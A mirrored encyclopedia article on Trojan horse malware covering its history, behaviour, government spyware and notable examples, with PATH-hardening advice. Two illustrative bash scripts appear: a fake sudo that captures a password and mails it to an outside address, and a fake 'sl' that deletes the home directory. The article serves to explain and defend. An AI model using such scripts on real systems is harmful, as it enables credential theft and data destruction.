Trojan horse (computing)

Last updated

In computing, a Trojan horse (or simply Trojan) is any malware that misleads users of its true intent by disguising itself as a standard program. The term is derived from the ancient Greek story of the deceptive Trojan Horse that led to the fall of the city of Troy. [1]

Contents

Trojans are generally spread by some form of social engineering. For example, where a user is duped into executing an email attachment disguised to appear innocuous (e.g., a routine form to be filled in), or by clicking on a fake advertisement on social media or anywhere else. Although their payload can be anything, many modern forms act as a backdoor, contacting a controller who can then have unauthorized access to the affected computer. [2] Ransomware attacks are often carried out using a Trojan.

Unlike computer viruses and worms, Trojans generally do not attempt to inject themselves into other files or otherwise propagate themselves. [3]

Use of the term

It is not clear where or when the concept, and this term for it, was first used, but by 1971 the first Unix manual assumed its readers knew both: [4]

Another early reference is in a US Air Force report in 1974 on the analysis of vulnerability in the Multics computer systems. [5]

It was made popular by Ken Thompson in his 1983 Turing Award acceptance lecture "Reflections on Trusting Trust", [6] subtitled: "To what extent should one trust a statement that a program is free of Trojan horses? Perhaps it is more important to trust the people who wrote the software." He mentioned that he knew about the possible existence of Trojans from a report on the security of Multics. [7] [8]

Behavior

Once installed, Trojans may perform a range of malicious actions. Many tend to contact one or more Command and Control (C2) servers across the Internet and await instruction. Since individual Trojans typically use a specific set of ports for this communication, it can be relatively simple to detect them. Moreover, other malware could potentially "take over" the Trojan, using it as a proxy for malicious action. [9]

In German-speaking countries, spyware used or made by the government is sometimes called govware. Govware is typically a Trojan software used to intercept communications from the target computer. Some countries like Switzerland and Germany have a legal framework governing the use of such software. [10] [11] Examples of govware Trojans include the Swiss MiniPanzer and MegaPanzer [12] and the German "state Trojan" nicknamed R2D2. [10] German govware works by exploiting security gaps unknown to the general public and accessing smartphone data before it becomes encrypted via other applications. [13]

Due to the popularity of botnets among hackers and the availability of advertising services that permit authors to violate their users' privacy, Trojans are becoming more common. According to a survey conducted by BitDefender from January to June 2009, "Trojan-type malware is on the rise, accounting for 83% of the global malware detected in the world." Trojans have a relationship with worms, as they spread with the help given by worms and travel across the internet with them. [14] BitDefender has stated that approximately 15% of computers are members of a botnet, usually recruited by a Trojan infection. [15]

Recent investigations have revealed that the Trojan horse method has been used as an attack on cloud computing systems. A Trojan attack on cloud systems tries to insert an application or service into the system that can impact the cloud services by changing or stopping the functionalities. When the cloud system identifies the attacks as legitimate, the service or application is performed which can damage and infect the cloud system. [16]

Linux sudo example

A Trojan horse is a program that purports to perform some legitimate function, yet upon execution it compromises the user's security. [17] A simple example is the following malicious version of the Linux sudo command. An attacker would place this script in a publicly writable directory (e.g., /tmp). If an administrator happens to be in this directory and executes sudo, then the Trojan may execute, compromising the administrator's password.

#!/usr/bin/env bash# Turn off the character echo to the screen. sudo does this to prevent the user's password from appearing on screen when they type it in. stty-echo  # Prompt user for password and then read input. To disguise the nature of this malicious version, do this 3 times to imitate the behavior of sudo when a user enters the wrong password.prompt_count=1while[$prompt_count-le3];doecho-n"[sudo] password for $(whoami): "readpassword_input echosleep3# sudo will pause between repeated promptsprompt_count=$((prompt_count+1))done# Turn the character echo back on. sttyechoecho$password_input|mail-s"$(whoami)'s password"outside@creep.com  # Display sudo's actual error message and then delete self.echo"sudo: 3 incorrect password attempts" rm$0exit1# sudo returns 1 with a failed password attempt

To prevent a sudoTrojan horse, set the . entry in the PATH environment variable to be located at the tail end. [18] For example: PATH=/usr/local/bin:/usr/bin:..

Linux ls example

Having . somewhere in the PATH is convenient, but there is a catch. [19] Another example is the following malicious version of the Linux ls command. However, the filename is not ls; instead, it is sl. An attacker would place this script in a publicly writable directory (e.g., /tmp).

#!/usr/bin/env bash# Remove the user's home directory, then remove self. rm-fr~2>/dev/null rm$0

To prevent a malicious programmer from anticipating this common typing mistake:

  1. omit . in the PATH or
  2. alias sl=ls [lower-alpha 1]

Notable examples

Private and governmental

Publicly available

Detected by security researchers

Capitalization

The computer term "Trojan horse" is derived from the legendary Trojan Horse of the ancient city of Troy. For this reason "Trojan" is often capitalized. However, while style guides and dictionaries differ, many suggest a lower case "trojan" for normal use. [30] [31]

See also

Related Research Articles

Adware, often called advertising-supported software by its developers, is software that generates revenue for its developer by automatically generating online advertisements in the user interface of the software or on a screen presented to the user during the installation process. The software may generate two types of revenue: one is for the display of the advertisement and another on a "pay-per-click" basis, if the user clicks on the advertisement. Some advertisements also act as spyware, collecting and reporting data about the user, to be sold or used for targeted advertising or user profiling. The software may implement advertisements in a variety of ways, including a static box display, a banner display, a full screen, a video, a pop-up ad or in some other form. All forms of advertising carry health, ethical, privacy and security risks for users.

Malware is any software intentionally designed to cause disruption to a computer, server, client, or computer network, leak private information, gain unauthorized access to information or systems, deprive access to information, or which unknowingly interferes with the user's computer security and privacy. Researchers tend to classify malware into one or more sub-types.

<span class="mw-page-title-main">Timeline of computer viruses and worms</span> Computer malware timeline

This timeline of computer viruses and worms presents a chronological timeline of noteworthy computer viruses, computer worms, Trojan horses, similar malware, related research and events.

Unix security refers to the means of securing a Unix or Unix-like operating system. A secure environment is achieved not only by the design concepts of these operating systems, but also through vigilant user and administrative practices.

A backdoor is a typically covert method of bypassing normal authentication or encryption in a computer, product, embedded device, or its embodiment. Backdoors are most often used for securing remote access to a computer, or obtaining access to plaintext in cryptosystems. From there it may be used to gain access to privileged information like passwords, corrupt or delete data on hard drives, or transfer information within autoschediastic networks.

Linux malware includes viruses, Trojans, worms and other types of malware that affect the Linux family of operating systems. Linux, Unix and other Unix-like computer operating systems are generally regarded as very well-protected against, but not immune to, computer viruses.

The compilation of a unified list of computer viruses is made difficult because of naming. To aid the fight against computer viruses and other types of malicious software, many security advisory organizations and developers of anti-virus software compile and publish lists of viruses. When a new virus appears, the rush begins to identify and understand it as well as develop appropriate counter-measures to stop its propagation. Along the way, a name is attached to the virus. As the developers of anti-virus software compete partly based on how quickly they react to the new threat, they usually study and name the viruses independently. By the time the virus is identified, many names denote the same virus.

Local Security Authority Subsystem Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing the security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens. It also writes to the Windows Security Log.

Internet security is a branch of computer security. It encompasses the Internet, browser security, web site security, and network security as it applies to other applications or operating systems as a whole. Its objective is to establish rules and measures to use against attacks over the Internet. The Internet is an inherently insecure channel for information exchange, with high risk of intrusion or fraud, such as phishing, online viruses, trojans, ransomware and worms.

Mobile malware is malicious software that targets mobile phones or wireless-enabled Personal digital assistants (PDA), by causing the collapse of the system and loss or leakage of confidential information. As wireless phones and PDA networks have become more and more common and have grown in complexity, it has become increasingly difficult to ensure their safety and security against electronic attacks in the form of viruses or other malware.

Rogue security software is a form of malicious software and internet fraud that misleads users into believing there is a virus on their computer and aims to convince them to pay for a fake malware removal tool that actually installs malware on their computer. It is a form of scareware that manipulates users through fear, and a form of ransomware. Rogue security software has been a serious security threat in desktop computing since 2008. An early example that gained infamy was SpySheriff and its clones, such as Nava Shield.

A number of computer operating systems employ security features to help prevent malicious software from gaining sufficient privileges to compromise the computer system. Operating systems lacking such features, such as DOS, Windows implementations prior to Windows NT, CP/M-80, and all Mac operating systems prior to Mac OS X, had only one category of user who was allowed to do anything. With separate execution contexts it is possible for multiple users to store private files, for multiple users to use a computer at the same time, to protect the system against malicious users, and to protect the system against malicious programs. The first multi-user secure system was Multics, which began development in the 1960s; it wasn't until UNIX, BSD, Linux, and NT in the late 80s and early 90s that multi-tasking security contexts were brought to x86 consumer machines.

Torpig, also known as Anserin or Sinowal is a type of botnet spread through systems compromised by the Mebroot rootkit by a variety of trojan horses for the purpose of collecting sensitive personal and corporate data such as bank account and credit card information. It targets computers that use Microsoft Windows, recruiting a network of zombies for the botnet. Torpig circumvents antivirus software through the use of rootkit technology and scans the infected system for credentials, accounts and passwords as well as potentially allowing attackers full access to the computer. It is also purportedly capable of modifying data on the computer, and can perform man-in-the-browser attacks.

Gumblar is a malicious JavaScript trojan horse file that redirects a user's Google searches, and then installs rogue security software. Also known as Troj/JSRedir-R this botnet first appeared in 2009.

<span class="mw-page-title-main">Genieo</span> Israeli company specializing in Mac malware

Genieo Innovation is an Israeli company, specializing in unwanted software which includes advertising and user tracking software, commonly referred to as a potentially unwanted program, adware, privacy-invasive software, grayware, or malware. They are best known for Genieo, an application of this type. They also own and operate InstallMac which distributes additional 'optional' search modifying software with other applications. In 2014, Genieo Innovation was acquired for $34 million by Somoto, another company which "bundles legitimate applications with offers for additional third party applications that may be unwanted by the user". This sector of the Israeli software industry is frequently referred to as Download Valley.

Mobile security, or mobile device security, is the protection of smartphones, tablets, and laptops from threats associated with wireless computing. It has become increasingly important in mobile computing. The security of personal and business information now stored on smartphones is of particular concern.

<span class="mw-page-title-main">Trend Micro Internet Security</span>

Trend Micro Internet Security is an antivirus and online security program developed by Trend Micro for the consumer market. According to NSS Lab comparative analysis of software products for this market in 2014, Trend Micro Internet Security was fastest in responding to new internet threats.

Shedun is a family of malware software targeting the Android operating system first identified in late 2015 by mobile security company Lookout, affecting roughly 20,000 popular Android applications. Lookout claimed the HummingBad malware was also a part of the Shedun family, however, these claims were refuted.

macOS malware includes viruses, trojan horses, worms and other types of malware that affect macOS, Apple's current operating system for Macintosh computers. macOS is said to rarely suffer malware or virus attacks, and has been considered less vulnerable than Windows. There is a frequent release of system software updates to resolve vulnerabilities. Utilities are also available to find and remove malware.

HummingBad is Android malware, discovered by Check Point in February 2016.

References

  1. "Trojan Horse Definition" . Retrieved April 5, 2012. Greek soldiers, unable to penetrate the defenses of the city of Troy during a years-long war, presented the city with a peace offering of a large wooden horse.
  2. "Difference between viruses, worms, and trojans". Symantec Security Center. Broadcom Inc. Archived from the original on August 19, 2013. Retrieved March 29, 2020.
  3. "VIRUS-L/comp.virus Frequently Asked Questions (FAQ) v2.00 (Question B3: What is a Trojan Horse?)". October 9, 1995. Archived from the original on August 5, 2020. Retrieved September 16, 2019.
  4. Thompson, Ken; Ritchie, Dennis M. "Unix Programmer's Manual, November 3, 1971" (PDF). p. 5. Retrieved March 28, 2020. Also, one may not change the owner of a file with the set—user—ID bit on, otherwise one could create Trojan Horses able to misuse other's files.
  5. Karger, P.A.; Schell, R.R., "Multics Security Evaluation: Vulnerability Analysis , ESD-TR-74-193" (PDF), HQ Electronic Systems Division: Hanscom AFB, MA, II, archived from the original (PDF) on July 9, 2011, retrieved December 24, 2017
  6. Ken Thompson (1984). "Reflection on Trusting Trust". Commun. ACM. 27 (8): 761–763. doi: 10.1145/358198.358210 ..
  7. Paul A. Karger; Roger R. Schell (2002), "Thirty Years Later: Lessons from the Multics Security Evaluation" (PDF), ACSAC: 119–126
  8. Karger et Schell wrote that Thompson added this reference in a later version of his Turing conference: Ken Thompson (November 1989), "On Trusting Trust.", Unix Review, 7 (11): 70–74
  9. Crapanzano, Jamie (2003). Deconstructing SubSeven, the Trojan Horse of Choice (Report). SANS Institute . Retrieved May 10, 2021.
  10. 1 2 Basil Cupa, Trojan Horse Resurrected: On the Legality of the Use of Government Spyware (Govware), LISS 2013, pp. 419–428
  11. "Häufig gestellte Fragen (Frequently Asked Questions)". Federal Department of Justice and Police. Archived from the original on May 6, 2013.
  12. Dunn, John (August 27, 2009). "Swiss coder publicises government spy Trojan". TechWorld . Archived from the original on January 26, 2014. Retrieved January 10, 2021.
  13. "German federal police use trojan virus to evade phone encryption". DW . Retrieved April 14, 2018.
  14. "BitDefender Malware and Spam Survey finds E-Threats Adapting to Online Behavioral Trends". BitDefender . Archived from the original on August 8, 2009. Retrieved March 27, 2020.
  15. Datta, Ganesh (August 7, 2014). "What are Trojans?". SecurAid. Archived from the original on August 12, 2014. Retrieved March 27, 2020.
  16. Kanaker, Hasan; Karim, Nader Abdel; Awwad, Samer A. B.; Ismail, Nurul H. A.; Zraqou, Jamal; Ali, Abdulla M. F. Al (December 20, 2022). "Trojan Horse Infection Detection in Cloud Based Environment Using Machine Learning". International Journal of Interactive Mobile Technologies (IJIM). 16 (24): 81–106. doi: 10.3991/ijim.v16i24.35763 . ISSN   1865-7923.
  17. Wood, Patrick H.; Kochan, Stephen G. (1985). UNIX System Security. Hayden Books. p. 42. ISBN   0-8104-6267-2.
  18. Wood, Patrick H.; Kochan, Stephen G. (1985). UNIX System Security. Hayden Books. p. 43. ISBN   0-8104-6267-2. The above Trojan horse works only if a user's PATH is set to search the current directory for commands before searching the system's directories.
  19. "What's wrong with having '.' in your $PATH?". Penn Engineering. Retrieved November 28, 2023. [I]f you're a clumsy typist and some day type "sl -l" instead of "ls -l", you run the risk of running "./sl", if there is one. Some "clever" programmer could anticipate common typing mistakes and leave programs by those names scattered throughout public directories. Beware.
  20. Seth, Kulakow (1998). "Is it still a Trojan horse or an Actual Valid Remote Control Administration Tool?" (Report). SANS Institute . Retrieved May 10, 2021.
  21. "Mega-Panzer". SourceForge. September 21, 2016.
  22. "Mini-Panzer". SourceForge. September 18, 2016.
  23. "What is Sova virus?". India Today.
  24. "Trojanized adware family abuses accessibility service to install whatever apps it wants – Lookout Blog".
  25. Neal, Dave (November 20, 2015). "Shedun trojan adware is hitting the Android Accessibility Service". The Inquirer . Incisive Business Media. Archived from the original on November 22, 2015. Retrieved March 27, 2020.{{cite web}}: CS1 maint: unfit URL (link)
  26. "Lookout discovers new trojanized adware; 20K popular apps caught in the crossfire – Lookout Blog".
  27. "Shuanet, ShiftyBug and Shedun malware could auto-root your Android". November 5, 2015.
  28. Times, Tech (November 9, 2015). "New Family of Android Malware Virtually Impossible To Remove: Say Hello To Shedun, Shuanet And ShiftyBug".
  29. "Android adware can install itself even when users explicitly reject it". November 19, 2015.
  30. "trojan". Collins Advanced Dictionary. Retrieved March 29, 2020.
  31. "trojan horse". Microsoft Style Guide. Microsoft. Retrieved March 29, 2020.

Notes

  1. Place the alias statement in /etc/profile
This page is based on this Wikipedia article
Text is available under the CC BY-SA 4.0 license; additional terms may apply.
Images, videos and audio are available under their respective licenses.